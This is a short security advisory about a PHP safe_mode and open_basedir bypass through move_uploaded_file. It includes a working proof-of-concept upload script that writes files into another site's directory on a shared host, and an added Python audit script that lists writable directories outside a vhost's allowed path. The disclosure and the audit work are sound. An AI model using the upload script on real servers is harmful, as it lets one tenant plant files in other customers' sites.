COMMAND

    php safe mode broken via "move_uploaded_file" directive

SYSTEMS AFFECTED

    Php ??

PROBLEM

    Tozz reported :

    It's possible to circumvent PHP safe_mode restrictions by using
    move_uploaded_file.

     Exploit :
     =======

    <?
    $file = $HTTP_POST_FILES['file']['name'];
    $type = $HTTP_POST_FILES['file']['type'];
    $size = $HTTP_POST_FILES['file']['size'];
    $temp = $HTTP_POST_FILES['file']['tmp_name'];

    $size_limit = "100000"; // set size limit in bytes

    if ($file){
        if ($size < $size_limit){
            // destination lies outside this vhost's open_basedir
            move_uploaded_file($temp, "/domains/somebodyelse.org/public_html/www/test/".$file);
            echo "The file <tt>$file</tt> was sucessfully uploaded";
        } else {
            echo "Sorry, your file exceeds the size limit of $size_limit bytes";
        }}

    echo "
    <form enctype='multipart/form-data' action=$PHP_SELF method=post>
    Upload a file: <input name='file' type='file'>
    <input type='submit' value='Upload'>
    </form>
    ";
    ?>

    The attacker moved the uploaded file to:
    "/domains/somebodyelse.org/public_html/www/test/"
    while the user is restricted with both safe_mode and open_basedir,
    this user is able to upload any file where the apache user has write
    access.

    Virtualhost configuration snippet:

    <VirtualHost IP_HERE>
        DocumentRoot /domains/whatever.com/public_html/root/
        ServerName root.whatever.com
        CustomLog /domains/whatever.com/logs/access_log combined
        ErrorLog /domains/whatever.com/logs/error_log
        php_admin_value safe_mode 1
        php_admin_value open_basedir /domains/whatever.com/public_html/root/
    </VirtualHost>

SOLUTION

    Patch was committed to CVS, release should go out anytime soon.
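
The report above notes that the upload lands anywhere the apache user has write access, so on a shared host it is worth listing those places. The following is an added example, not part of the original advisory: it reports directories outside a vhost's open_basedir that a given account could write to, judged by Unix mode bits only. The function names, the `apache` account name and the `/domains` hosting root are assumptions.

```python
# Added example, not part of the original advisory. Unix mode bits only; ACLs ignored.
import os


def can_write(st, uid, gids):
    """True if uid/gids may create files in a directory with this stat (needs w+x)."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        shift = 6
    elif st.st_gid in gids:
        shift = 3
    else:
        shift = 0
    return ((st.st_mode >> shift) & 0o3) == 0o3


def inside(path, base):
    """True if path is base or lies beneath it, compared by path component."""
    path, base = os.path.realpath(path), os.path.realpath(base)
    return os.path.commonpath([path, base]) == base


def exposed_dirs(hosting_root, open_basedir, uid, gids):
    """Directories under hosting_root, outside open_basedir, writable by uid/gids."""
    found = []
    for dirpath, dirnames, _ in os.walk(hosting_root):
        if inside(dirpath, open_basedir):
            dirnames[:] = []  # the vhost's own tree is expected to be writable
            continue
        if can_write(os.stat(dirpath), uid, gids):
            found.append(os.path.realpath(dirpath))
    return sorted(found)


if __name__ == "__main__":
    import grp
    import pwd

    user = "apache"  # assumed web server account name; adjust for your host
    try:
        pw = pwd.getpwnam(user)
    except KeyError:
        raise SystemExit(f"no such account: {user}")
    gids = {pw.pw_gid} | {g.gr_gid for g in grp.getgrall() if user in g.gr_mem}
    # /domains is the hosting root implied by the paths in the advisory
    base = "/domains/whatever.com/public_html/root/"
    for d in exposed_dirs("/domains", base, pw.pw_uid, gids):
        print(d)
```

Run it with enough privilege to traverse every tenant directory, since unreadable subtrees are skipped silently.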